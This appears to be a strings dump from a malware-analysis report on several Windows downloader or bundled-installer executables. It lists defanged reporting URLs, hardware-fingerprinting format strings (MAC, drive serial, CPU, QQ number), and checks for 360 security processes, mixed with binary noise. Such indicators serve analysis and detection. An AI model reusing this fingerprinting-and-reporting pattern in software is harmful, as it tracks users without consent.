\qqwry.dat
\qqwry.dat
.bdre
.bdre
.bdtp
.bdtp
\Baidu\BaiduPlayer\Service.ini
\Baidu\BaiduPlayer\Service.ini
f182cd1a-751e-4a90-9153-cbf3eb0e2040-zxcBDNet
f182cd1a-751e-4a90-9153-cbf3eb0e2040-zxcBDNet
Global\f182cd1a-751e-4a90-9153-cbf3eb0e2040-mnbvcxzBDExit
Global\f182cd1a-751e-4a90-9153-cbf3eb0e2040-mnbvcxzBDExit
f182cd1a-751e-4a90-9153-cbf3eb0e2040-zxcBDNetMutex
f182cd1a-751e-4a90-9153-cbf3eb0e2040-zxcBDNetMutex
F=>%p, S=>%d
F=>%p, S=>%d
d\P2PBase.dll
d\P2PBase.dll
\P2SBase.dll
\P2SBase.dll
\P2PStatReport.dll
\P2PStatReport.dll
\StatReport.exe
\StatReport.exe
Global\0531f939-e126-410c-8e44-dc1c0b375a79_%u
Global\0531f939-e126-410c-8e44-dc1c0b375a79_%u
BufferPercent=%d
BufferPercent=%d
State=,Error=,Peers==/=/=(=), Speed=d,DLed=I64i(%6.2f%%),S=I64i,Dup=%I64i(%6.2f%%),R=I64i,DV/MV/DE/ME=%d/%d/%d/%d,EM=%I64i,H=%u
State=,Error=,Peers==/=/=(=), Speed=d,DLed=I64i(%6.2f%%),S=I64i,Dup=%I64i(%6.2f%%),R=I64i,DV/MV/DE/ME=%d/%d/%d/%d,EM=%I64i,H=%u
State=,Error=,Peers==/=/=(=), Speed=d,DLed=I64i(00%%),S=I64i,Dup=%I64i(0.00%%),R=I64i,H=%u
State=,Error=,Peers==/=/=(=), Speed=d,DLed=I64i(00%%),S=I64i,Dup=%I64i(0.00%%),R=I64i,H=%u
Q=%d, FH=%d,P=%d, B=%d,P2P=%u,SCnt=%u,QDat=%dKB,QSta=%d,QSpe=%d,FID=%s Name=%s
Q=%d, FH=%d,P=%d, B=%d,P2P=%u,SCnt=%u,QDat=%dKB,QSta=%d,QSpe=%d,FID=%s Name=%s
Pending== Partial==/=, F=}/}/}, DT=%d, RC=%d,DA=%d, WP=%I64i,WD=%I64i
Pending== Partial==/=, F=}/}/}, DT=%d, RC=%d,DA=%d, WP=%I64i,WD=%I64i
%6I64iK,%6I64iK,%s,AReq/ARes=%6u/%6u,RP=%d,LP=%d,RTT/RTO=M/M,W==,Q==,P==,LAN=%d,C=%d,R=-,NAT=-,V=MKB/s
%6I64iK,%6I64iK,%s,AReq/ARes=%6u/%6u,RP=%d,LP=%d,RTT/RTO=M/M,W==,Q==,P==,LAN=%d,C=%d,R=-,NAT=-,V=MKB/s
WAdd=%u.%u.%u.%u:%u(%s)
WAdd=%u.%u.%u.%u:%u(%s)
LAddr=%u.%u.%u.%u:%u
LAddr=%u.%u.%u.%u:%u
EAddr=%u.%u.%u.%u:%u
EAddr=%u.%u.%u.%u:%u
Ver=%u.%u.%u.%u
Ver=%u.%u.%u.%u
Reserve=%d
Reserve=%d
UID=%I64i,Sta=%d,StaNext=%d,Retry=%d,MP=]/] KB,D=M/M KB/s,U=M/M KB/s,%s
UID=%I64i,Sta=%d,StaNext=%d,Retry=%d,MP=]/] KB,D=M/M KB/s,U=M/M KB/s,%s
Self:%s(%d),P2P:%s(%d),P2S:%s(%d),Stat:%s(%d),Tcps=-,Port=%u,Err=%u,Up=%d,Alloc==,Wr=M,Bitmap=-,WC==,AC==,RQ=-
Self:%s(%d),P2P:%s(%d),P2S:%s(%d),Stat:%s(%d),Tcps=-,Port=%u,Err=%u,Up=%d,Alloc==,Wr=M,Bitmap=-,WC==,AC==,RQ=-
\Baidu\BaiduPlayer\tasks.dat
\Baidu\BaiduPlayer\tasks.dat
\Baidu\BaiduPlayer\tasks.ini
\Baidu\BaiduPlayer\tasks.ini
field%d
field%d
\assfile.dll
\assfile.dll
\ManagerStub.dll
\ManagerStub.dll
Test Fail, Error=%d, r2=%d
Test Fail, Error=%d, r2=%d
MyBDHotkey1
MyBDHotkey1
MyBDHotkey
MyBDHotkey
MyBDHotkeyVer
MyBDHotkeyVer
CKernel32.dll
CKernel32.dll
/commonlib.dll
/commonlib.dll
%Program Files%\tools\BaiduP2PService.exe
%Program Files%\tools\BaiduP2PService.exe
"%Program Files%\tools\BaiduP2PService.exe"
"%Program Files%\tools\BaiduP2PService.exe"
Baidu.com, Inc.
Baidu.com, Inc.
1,0,14,43
1,0,14,43
QQPCDownload71960.exe_2776:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
aSSSh
aSSSh
FTPjK
FTPjK
FtPj;
FtPj;
C.PjRV
C.PjRV
.mixcrt
.mixcrt
KERNEL32.DLL
KERNEL32.DLL
mscoree.dll
mscoree.dll
portuguese-brazilian
portuguese-brazilian
Please contact the application's support team for more information.
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- CRT not initialized
- floating point support not loaded
- floating point support not loaded
kernel32.dll
kernel32.dll
operator
operator
GetProcessWindowStation
GetProcessWindowStation
USER32.DLL
USER32.DLL
inflate 1.1.3 Copyright 1995-1998 Mark Adler
inflate 1.1.3 Copyright 1995-1998 Mark Adler
X;
X;
%s>
%s>
%s="%s"
%s="%s"
%s='%s'
%s='%s'
version="%s"
version="%s"
encoding="%s"
encoding="%s"
standalone="%s"
standalone="%s"
lzma 7z ace arc arj bz bz2 deb lzo lzx gz pak rpm sit tgz tbz tbz2 tgz cab ha lha lzh rar zoo zip jar ear war msi 3gp avi mov mpeg mpg mpe wmv aac ape fla flac la mp3 m4a mp4 ofr ogg pac ra rm rka shn swa tta wv wma wav swf chm hxi hxs gif jpeg jpg jp2 png tiff bmp ico psd psp awg ps eps cgm dxf svg vrml wmf emf ai md cad dwg pps key sxi max 3ds iso bin nrg mdf img pdi tar cpio xpi vfd vhd vud vmc vsv vmdk dsk nvram vmem vmsd vmsn vmss vmtm inl inc idl acf asa h hpp hxx c cpp cxx rc java cs pas bas vb cls ctl frm dlg def f77 f f90 f95 asm sql manifest dep mak clw csproj vcproj sln dsp dsw class bat cmd xml xsd xsl xslt hxk hxc htm html xhtml xht mht mhtml htw asp aspx css cgi jsp shtml awk sed hta js php php3 php4 php5 phptml pl pm py pyo rb sh tcl vbs text txt tex ans asc srt reg ini doc docx mcw dot rtf hlp xls xlr xlt xlw ppt pdf sxc sxd sxi sxg sxw stc sti stw stm odt ott odg otg odp otp ods ots odf abw afp cwk lwp wpd wps wpt wrf wri abf afm bdf fon mgf otf pcf pfa snf ttf dbf mdb nsf ntf wdb db fdb gdb exe dll ocx vbx sfx sys tlb awx com obj lib out o so pdb pch idb ncb opt
lzma 7z ace arc arj bz bz2 deb lzo lzx gz pak rpm sit tgz tbz tbz2 tgz cab ha lha lzh rar zoo zip jar ear war msi 3gp avi mov mpeg mpg mpe wmv aac ape fla flac la mp3 m4a mp4 ofr ogg pac ra rm rka shn swa tta wv wma wav swf chm hxi hxs gif jpeg jpg jp2 png tiff bmp ico psd psp awg ps eps cgm dxf svg vrml wmf emf ai md cad dwg pps key sxi max 3ds iso bin nrg mdf img pdi tar cpio xpi vfd vhd vud vmc vsv vmdk dsk nvram vmem vmsd vmsn vmss vmtm inl inc idl acf asa h hpp hxx c cpp cxx rc java cs pas bas vb cls ctl frm dlg def f77 f f90 f95 asm sql manifest dep mak clw csproj vcproj sln dsp dsw class bat cmd xml xsd xsl xslt hxk hxc htm html xhtml xht mht mhtml htw asp aspx css cgi jsp shtml awk sed hta js php php3 php4 php5 phptml pl pm py pyo rb sh tcl vbs text txt tex ans asc srt reg ini doc docx mcw dot rtf hlp xls xlr xlt xlw ppt pdf sxc sxd sxi sxg sxw stc sti stw stm odt ott odg otg odp otp ods ots odf abw afp cwk lwp wpd wps wpt wrf wri abf afm bdf fon mgf otf pcf pfa snf ttf dbf mdb nsf ntf wdb db fdb gdb exe dll ocx vbx sfx sys tlb awx com obj lib out o so pdb pch idb ncb opt
d:\QQPCDownloader_proj\PackageTools\product\win32\dbginfo\kpacket.pdb
d:\QQPCDownloader_proj\PackageTools\product\win32\dbginfo\kpacket.pdb
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
SHLWAPI.dll
SHLWAPI.dll
GetProcessHeap
GetProcessHeap
GetCPInfo
GetCPInfo
GetConsoleOutputCP
GetConsoleOutputCP
zcÁ
zcÁ
.?AUICryptoSetPassword@@
.?AUICryptoSetPassword@@
.?AVCCryptoGetTextPassword@N7z@NArchive@@
.?AVCCryptoGetTextPassword@N7z@NArchive@@
.?AUICryptoGetTextPassword@@
.?AUICryptoGetTextPassword@@
Hummer Setup EXE
Hummer Setup EXE
%s%s_d_%x
%s%s_d_%x
setup.xml
setup.xml
A%s%s
A%s%s
%s_d_%x
%s_d_%x
%s%s%s
%s%s%s
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\QQPCDownload71960.exe
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\QQPCDownload71960.exe
MM-liao8863.exe_2808:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
SSSSh
SSSSh
FtPh
FtPh
tGHt.Ht&
tGHt.Ht&
OnBeforeNavigation: URL="%s", frame="%s", post_data=[0xX,%d bytes], headers="%s"
OnBeforeNavigation: URL="%s", frame="%s", post_data=[0xX,%d bytes], headers="%s"
OnDocumentComplete: URL="%s"
OnDocumentComplete: URL="%s"
OnProgressChange: progress=%d, progress_max=%d
OnProgressChange: progress=%d, progress_max=%d
OnNavigationComplete2: URL="%s"
OnNavigationComplete2: URL="%s"
OnStatusTextChange: text="%s"
OnStatusTextChange: text="%s"
OnTitleChange: text="%s"
OnTitleChange: text="%s"
C:\Windows\Temp\temp.icon
C:\Windows\Temp\temp.icon
c://temp.icon
c://temp.icon
ProExe
ProExe
DownloadUrl
DownloadUrl
ErrorUrl
ErrorUrl
AdvertUrl
AdvertUrl
XieyiUrl
XieyiUrl
hXXp://tj.9158.com/Opendownloadernewxml.aspx
hXXp://tj.9158.com/Opendownloadernewxml.aspx
(3-!0,1'8"5.*2$
(3-!0,1'8"5.*2$
DeviceIOControl IOCTL_STORAGE_QUERY_PROPERTY error = %d
DeviceIOControl IOCTL_STORAGE_QUERY_PROPERTY error = %d
**** DISK_GEOMETRY_EX for drive %d ****
**** DISK_GEOMETRY_EX for drive %d ****
Disk is%s fixed
Disk is%s fixed
%d ReadPhysicalDriveInNTWithZeroRights ERROR|nDeviceIoControl(%s, IOCTL_DISK_GET_DRIVE_GEOMETRY_EX) returned 0
%d ReadPhysicalDriveInNTWithZeroRights ERROR|nDeviceIoControl(%s, IOCTL_DISK_GET_DRIVE_GEOMETRY_EX) returned 0
**** STORAGE_DEVICE_DESCRIPTOR for drive %d ****
**** STORAGE_DEVICE_DESCRIPTOR for drive %d ****
Vendor Id = [%s]
Vendor Id = [%s]
Product Id = [%s]
Product Id = [%s]
Product Revision = [%s]
Product Revision = [%s]
Serial Number = [%s]
Serial Number = [%s]
%d STORAGE_DEVICE_DESCRIPTOR contents for drive %d
%d STORAGE_DEVICE_DESCRIPTOR contents for drive %d
DeviceType: x
DeviceType: x
DeviceTypeModifier: x
DeviceTypeModifier: x
RemovableMedia: %d
RemovableMedia: %d
CommandQueueing: %d
CommandQueueing: %d
BusType: %d
BusType: %d
%d ReadPhysicalDriveInNTWithZeroRights ERROR
%d ReadPhysicalDriveInNTWithZeroRights ERROR
CreateFile(%s) returned INVALID_HANDLE_VALUE
CreateFile(%s) returned INVALID_HANDLE_VALUE
\\.\PhysicalDrive%d
\\.\PhysicalDrive%d
Drive%dType
Drive%dType
DriveÜontrollerBufferSize
DriveÜontrollerBufferSize
DriveÜontrollerRevisionNumber
DriveÜontrollerRevisionNumber
Drive%dSerialNumber
Drive%dSerialNumber
Drive%dModelNumber
Drive%dModelNumber
Controller Buffer Size on Drive___: %s bytes
Controller Buffer Size on Drive___: %s bytes
Drive Controller Revision Number__: [%s]
Drive Controller Revision Number__: [%s]
Drive Serial Number_______________: [%s]
Drive Serial Number_______________: [%s]
Drive Model Number________________: [%s]
Drive Model Number________________: [%s]
Drive %d -
Drive %d -
%d ReadPhysicalDriveInNTWithAdminRights ERROR
%d ReadPhysicalDriveInNTWithAdminRights ERROR
No device found at position %d (%d)
No device found at position %d (%d)
DeviceIoControl(%d, DFP_GET_VERSION) returned 0, error is %d
DeviceIoControl(%d, DFP_GET_VERSION) returned 0, error is %d
%d ReadPhysicalDriveInNTUsingSmart ERROR
%d ReadPhysicalDriveInNTUsingSmart ERROR
DeviceIoControl(%d, SMART_GET_VERSION) returned 0, error is %d
DeviceIoControl(%d, SMART_GET_VERSION) returned 0, error is %d
Error Code %d
Error Code %d
ERROR: Could not open IDE21201.VXD file
ERROR: Could not open IDE21201.VXD file
\\.\IDE21201.VXD
\\.\IDE21201.VXD
ERROR: Could not SetPriorityClass, LastError: %d
ERROR: Could not SetPriorityClass, LastError: %d
\\.\Scsi%d:
\\.\Scsi%d:
Hard Drive Model Number___________: %s
Hard Drive Model Number___________: %s
Hard Drive Serial Number__________: %s
Hard Drive Serial Number__________: %s
%s (%s:%d)
%s (%s:%d)
D:\Program Files (x86)\Microsoft Visual Studio 9.0\VC\atlmfc\include\afxwin1.inl
D:\Program Files (x86)\Microsoft Visual Studio 9.0\VC\atlmfc\include\afxwin1.inl
softlist=%s&lmarkid=%s
softlist=%s&lmarkid=%s
hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=1&jumpname=&appid=549000912&ptcss=undefined¶m=u1%3Dhttp%253A%252F%252Fqun.qzone.qq.com%252Fgroup&css=&mibao_css=&s_url=http%3A%2F%2Fqun.qzone.qq.com%2Fgroup&low_login=0&style=12&authParamUrl=&needVip=1&ptui_version=10028
hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=1&jumpname=&appid=549000912&ptcss=undefined¶m=u1%3Dhttp%253A%252F%252Fqun.qzone.qq.com%252Fgroup&css=&mibao_css=&s_url=http%3A%2F%2Fqun.qzone.qq.com%2Fgroup&low_login=0&style=12&authParamUrl=&needVip=1&ptui_version=10028
w@C:\Windows\Temp\
w@C:\Windows\Temp\
%sDownLoad
%sDownLoad
_%s%s.exe
_%s%s.exe
_%s.exe
_%s.exe
/S /D=%s
/S /D=%s
%sDownLoad\%s
%sDownLoad\%s
Browser=%s
Browser=%s
&Resolution=%s&OS=%s&KEY=%s&Mac=%s&HardDrive=%s&CPU=%s&Graphics=%s
&Resolution=%s&OS=%s&KEY=%s&Mac=%s&HardDrive=%s&CPU=%s&Graphics=%s
&Safe=%s&QQ=%s&Sougou=%s&Lmarkid=%s&Wmarkid=%s&Mtype=%s&tick=%d&flag=%s&status=%d&qqnumber=%s
&Safe=%s&QQ=%s&Sougou=%s&Lmarkid=%s&Wmarkid=%s&Mtype=%s&tick=%d&flag=%s&status=%d&qqnumber=%s
&downloadtime=%d&setuptime=%d&downloadflag=%d&v=V1.9
&downloadtime=%d&setuptime=%d&downloadflag=%d&v=V1.9
hXXp://tj.9158.com/DownloadInsertinfo.aspx?
hXXp://tj.9158.com/DownloadInsertinfo.aspx?
%ld%s%s
%ld%s%s
%d*%d
%d*%d
%s(%s)
%s(%s)
...%d%c
...%d%c
%Program Files%
%Program Files%
%s Inx:%d Offset:%d Len:%d
%s Inx:%d Offset:%d Len:%d
.tmp.tg
.tmp.tg
****ERR:%d,
****ERR:%d,
nInx:%d, offset:%d, siz:%d
nInx:%d, offset:%d, siz:%d
%d, lRemain
%d, lRemain
ConnectSvr:%s
ConnectSvr:%s
X-X-X-X-X-X
X-X-X-X-X-X
SOFTWARE\%s
SOFTWARE\%s
Microsoft Windows 95
Microsoft Windows 95
Microsoft Windows NT 4.0
Microsoft Windows NT 4.0
Microsoft Windows 98
Microsoft Windows 98
Microsoft Windows Me
Microsoft Windows Me
Microsoft Windows 2000
Microsoft Windows 2000
Microsoft Windows XP
Microsoft Windows XP
Microsoft Windows Server 2003 R2
Microsoft Windows Server 2003 R2
Microsoft Windows Server 2003
Microsoft Windows Server 2003
Microsoft Windows XP Professional x64 Edition
Microsoft Windows XP Professional x64 Edition
Microsoft Windows Server 2008
Microsoft Windows Server 2008
Microsoft Windows Vista
Microsoft Windows Vista
Microsoft Windows Server 2008 R2
Microsoft Windows Server 2008 R2
Microsoft Windows 7
Microsoft Windows 7
unknown OperatingSystem.
unknown OperatingSystem.
Web Edition
Web Edition
\StringFileInfo\xx\ProductVersion
\StringFileInfo\xx\ProductVersion
\StringFileInfo\xx\ProductName
\StringFileInfo\xx\ProductName
HKEY_USERS
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
HKEY_CLASSES_ROOT
SOFTWARE\Microsoft\Windows NT\CurrentVersion
SOFTWARE\Microsoft\Windows NT\CurrentVersion
http\shell\open\command
http\shell\open\command
%s %s
%s %s
\SogouExe\SogouExe.exe
\SogouExe\SogouExe.exe
SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Sogou Input
SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Sogou Input
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sogou Input
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sogou Input
%Program Files% (x86)\SogouInput\SogouExe\SogouExe.exe
%Program Files% (x86)\SogouInput\SogouExe\SogouExe.exe
%Program Files%\SogouInput\SogouExe\SogouExe.exe
%Program Files%\SogouInput\SogouExe\SogouExe.exe
M.exe
M.exe
deepscan\zhudongfangyu.exe
deepscan\zhudongfangyu.exe
360safe.exe
360safe.exe
ZhuDongFangYu.exe
ZhuDongFangYu.exe
QQ.exe
QQ.exe
T58web
T58web
9158web
9158web
User-Agent:Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
User-Agent:Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
HTTP/1.1
HTTP/1.1
%s?log=%s&version=20140121
%s?log=%s&version=20140121
hXXp://tj.9158.com/logtest.aspx
hXXp://tj.9158.com/logtest.aspx
:%d,server:%s, ip:%s,
:%d,server:%s, ip:%s,
:url:%s, server:%s,error msg:%s, errcode:%d
:url:%s, server:%s,error msg:%s, errcode:%d
kernel32.dll
kernel32.dll
CNotSupportedException
CNotSupportedException
hhctrl.ocx
hhctrl.ocx
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
Afx:%p:%x:%p:%p:%p
Afx:%p:%x:%p:%p:%p
Afx:%p:%x
Afx:%p:%x
commctrl_DragListMsg
commctrl_DragListMsg
CCmdTarget
CCmdTarget
CHttpConnection
CHttpConnection
CHttpFile
CHttpFile
hXXp://
hXXp://
WININET.DLL
WININET.DLL
HTTP/1.0
HTTP/1.0
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp
File%d
File%d
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Software\Microsoft\Windows\CurrentVersion\Policies\Network
Software\Microsoft\Windows\CurrentVersion\Policies\Network
Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32
Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32
ntdll.dll
ntdll.dll
%s%s.dll
%s%s.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appcore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appcore.cpp
comctl32.dll
comctl32.dll
comdlg32.dll
comdlg32.dll
shell32.dll
shell32.dll
mfcm90.dll
mfcm90.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filetxt.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filetxt.cpp
user32.dll
user32.dll
ole32.dll
ole32.dll
Please contact the application's support team for more information.
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- CRT not initialized
- floating point support not loaded
- floating point support not loaded
operator
operator
GetProcessWindowStation
GetProcessWindowStation
USER32.DLL
USER32.DLL
F%D,3
F%D,3
OLEACC.dll
OLEACC.dll
SHLWAPI.dll
SHLWAPI.dll
WSOCK32.dll
WSOCK32.dll
GetProcessHeap
GetProcessHeap
GetCPInfo
GetCPInfo
GetConsoleOutputCP
GetConsoleOutputCP
KERNEL32.dll
KERNEL32.dll
GetKeyState
GetKeyState
UnhookWindowsHookEx
UnhookWindowsHookEx
SetWindowsHookExA
SetWindowsHookExA
CreateDialogIndirectParamA
CreateDialogIndirectParamA
USER32.dll
USER32.dll
GetViewportExtEx
GetViewportExtEx
SetViewportOrgEx
SetViewportOrgEx
OffsetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
SetViewportExtEx
ScaleViewportExtEx
ScaleViewportExtEx
GDI32.dll
GDI32.dll
COMDLG32.dll
COMDLG32.dll
WINSPOOL.DRV
WINSPOOL.DRV
RegCloseKey
RegCloseKey
RegOpenKeyA
RegOpenKeyA
RegCreateKeyExA
RegCreateKeyExA
RegOpenKeyExA
RegOpenKeyExA
RegEnumKeyExA
RegEnumKeyExA
RegDeleteKeyA
RegDeleteKeyA
RegEnumKeyA
RegEnumKeyA
ADVAPI32.dll
ADVAPI32.dll
ShellExecuteA
ShellExecuteA
ShellExecuteExA
ShellExecuteExA
SHELL32.dll
SHELL32.dll
COMCTL32.dll
COMCTL32.dll
oledlg.dll
oledlg.dll
OLEAUT32.dll
OLEAUT32.dll
GdiplusShutdown
GdiplusShutdown
gdiplus.dll
gdiplus.dll
NETAPI32.dll
NETAPI32.dll
VERSION.dll
VERSION.dll
UrlUnescapeA
UrlUnescapeA
InternetCrackUrlA
InternetCrackUrlA
InternetCanonicalizeUrlA
InternetCanonicalizeUrlA
HttpQueryInfoA
HttpQueryInfoA
HttpSendRequestA
HttpSendRequestA
InternetOpenUrlA
InternetOpenUrlA
HttpOpenRequestA
HttpOpenRequestA
WININET.dll
WININET.dll
.?AVCCmdTarget@@
.?AVCCmdTarget@@
.PAVCFileException@@
.PAVCFileException@@
.?AV?$CList@PAVCFTPTask@@AAPAV1@@@
.?AV?$CList@PAVCFTPTask@@AAPAV1@@@
.PAVCException@@
.PAVCException@@
.?AVCFTPTask@@
.?AVCFTPTask@@
.?AVCHttpService@@
.?AVCHttpService@@
.?AVCMD5Checksum@@
.?AVCMD5Checksum@@
.PAVCObject@@
.PAVCObject@@
.PAVCOleException@@
.PAVCOleException@@
.PAVCMemoryException@@
.PAVCMemoryException@@
.PAVCSimpleException@@
.PAVCSimpleException@@
.PAVCNotSupportedException@@
.PAVCNotSupportedException@@
.PAVCInvalidArgException@@
.PAVCInvalidArgException@@
.?AVCNotSupportedException@@
.?AVCNotSupportedException@@
.?AVCTestCmdUI@@
.?AVCTestCmdUI@@
.?AVCCmdUI@@
.?AVCCmdUI@@
.PAVCUserException@@
.PAVCUserException@@
.PAVCResourceException@@
.PAVCResourceException@@
.PAVCInternetException@@
.PAVCInternetException@@
.?AVCHttpConnection@@
.?AVCHttpConnection@@
.?AVCHttpFile@@
.?AVCHttpFile@@
.PAVCArchiveException@@
.PAVCArchiveException@@
.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@
.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@
.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@
.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@
.PAVCOleDispatchException@@
.PAVCOleDispatchException@@
zcÁ
zcÁ
00000000000000000001
00000000000000000001
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\MM-liao8863.exe
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\MM-liao8863.exe
`R.qB
`R.qB
h/y%DlRZ
h/y%DlRZ
J!Ç
J!Ç
yR^y.%U3
yR^y.%U3
/.Ro}!
/.Ro}!
p)%sQ
p)%sQ
CZ%SY
CZ%SY
.vyOx
.vyOx
.Pm[
.Pm[
42a%u
42a%u
O%fWU
O%fWU
%cPqt
%cPqt
F2/%c
F2/%c
C7%SQ5
C7%SQ5
XU%fR
XU%fR
QN.Ui
QN.Ui
IßD
IßD
(Bô|
(Bô|
.Qsty
.Qsty
.bYV`
.bYV`
40%sS
40%sS
%%co\s
%%co\s
P.WGD
P.WGD
2Um
2Um
%U2b&0
%U2b&0
%se7sQ
%se7sQ
[Q.QN]
[Q.QN]
4g%x=XL$5
4g%x=XL$5
.Bsw&wf
.Bsw&wf
uÿQ
uÿQ
R#.oR
R#.oR
45.sSC
45.sSC
OBW2%S2%S2
OBW2%S2%S2
u\%Cr@
u\%Cr@
.Pd4{
.Pd4{
[K.On
[K.On
W.eQYT
W.eQYT
gB7%U
gB7%U
9~ui.QBv@
9~ui.QBv@
J.pEu
J.pEu
\.MdB
\.MdB
accKeyboardShortcut
accKeyboardShortcut
mscoree.dll
mscoree.dll
ekernel32.dll
ekernel32.dll
KERNEL32.DLL
KERNEL32.DLL
DownloadInstall.Document
DownloadInstall.Document
(*.*)
(*.*)
Output.prn$
Output.prn$
(*.prn)|*.prn|
(*.prn)|*.prn|
(*.*)|*.*||
(*.*)|*.*||
1, 0, 0, 1
1, 0, 0, 1
DownloadInstall.EXE
DownloadInstall.EXE
install1393485.exe_1148:
`.rsrc
`.rsrc
\rsdebug.ini
\rsdebug.ini
c:\%s
c:\%s
dbghelp.dll
dbghelp.dll
kernel32.dll
kernel32.dll
d-d-d(d-d-d)
d-d-d(d-d-d)
Kernel32.dll
Kernel32.dll
\rsmain.exe
\rsmain.exe
[d-d-d][d:d:d:d]
[d-d-d][d:d:d:d]
%s\%s
%s\%s
%s\*.*
%s\*.*
C:\Temp
C:\Temp
SOFTWARE\Rising\%s
SOFTWARE\Rising\%s
2.log
2.log
[u]
[u]
[0xX]
[0xX]
RAV.INI
RAV.INI
\Rs7zSfx.log
\Rs7zSfx.log
\setup.dll
\setup.dll
CLSID\{CAA2D3B1-4BB5-4a45-A17A-122773379D99}
CLSID\{CAA2D3B1-4BB5-4a45-A17A-122773379D99}
%s\CompsVer.inf
%s\CompsVer.inf
Setup.exe
Setup.exe
%s\auto.ini
%s\auto.ini
@Sleep...%d
@Sleep...%d
%s Start
%s Start
%s End
%s End
{E5C53971-D80E-4500-BE0D-761BF3CD8457}
{E5C53971-D80E-4500-BE0D-761BF3CD8457}
Unsupported Method
Unsupported Method
Password is not defined
Password is not defined
mscoree.dll
mscoree.dll
- This application cannot run using the active version of the Microsoft .NET Runtime
- This application cannot run using the active version of the Microsoft .NET Runtime
Please contact the application's support team for more information.
Please contact the application's support team for more information.
GetProcessWindowStation
GetProcessWindowStation
user32.dll
user32.dll
internal state. The program cannot safely continue execution and must
internal state. The program cannot safely continue execution and must
continue execution and must now be terminated.
continue execution and must now be terminated.
CLSID\{CAA2D3B2-4BB5-4a45-A17A-122773379D99}
CLSID\{CAA2D3B2-4BB5-4a45-A17A-122773379D99}
XXXXXXXXXXX
XXXXXXXXXXX
{X-X-X-XX-XXXXXX}
{X-X-X-XX-XXXXXX}
\NetConfig.ini
\NetConfig.ini
{"vkey": "%s", "guid": "%s", "sguid": "%s", "actionid": "%s", "tag": "%s","step": "%s",
{"vkey": "%s", "guid": "%s", "sguid": "%s", "actionid": "%s", "tag": "%s","step": "%s",
"result": "%s", "errorcode": "%s", "remark": "%s", "pa": "%s", "pb": "%s"}
"result": "%s", "errorcode": "%s", "remark": "%s", "pa": "%s", "pb": "%s"}
Label.dat
Label.dat
hXXp://center.rising.com.cn/urg.asp?v=%s&t=%s&a=%s
hXXp://center.rising.com.cn/urg.asp?v=%s&t=%s&a=%s
%sbase
%sbase
Iphlpapi.dll
Iphlpapi.dll
\\.\PhysicalDrive%d
\\.\PhysicalDrive%d
\\.\Scsi%d:
\\.\Scsi%d:
MSIE %d.%d
MSIE %d.%d
WININET.DLL
WININET.DLL
Windows
Windows
Windows Me
Windows Me
Windows 98
Windows 98
Windows 95
Windows 95
Windows NT %d.%d
Windows NT %d.%d
%s:%d
%s:%d
Mozilla/4.0 (compatible; %s; %s; Rising)
Mozilla/4.0 (compatible; %s; %s; Rising)
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
HTTP/1.0
HTTP/1.0
C:\DistributedAutoLink\Temp\CompileOutputDir\7zSfx.pdb
C:\DistributedAutoLink\Temp\CompileOutputDir\7zSfx.pdb
COMCTL32.dll
COMCTL32.dll
GDI32.dll
GDI32.dll
restorelog.txt
restorelog.txt
zcÁ
zcÁ
T3%dU
T3%dU
K.ZuNN
K.ZuNN
)$OI%f
)$OI%f
B.Yo@
B.Yo@
26.Ip
26.Ip
up.yF
up.yF
~mM.Bv
~mM.Bv
qPndR.Ts
qPndR.Ts
Thawte Certification1
Thawte Certification1
hXXp://ocsp.thawte.com0
hXXp://ocsp.thawte.com0
.hXXp://crl.thawte.com/ThawteTimestampingCA.crl0
.hXXp://crl.thawte.com/ThawteTimestampingCA.crl0
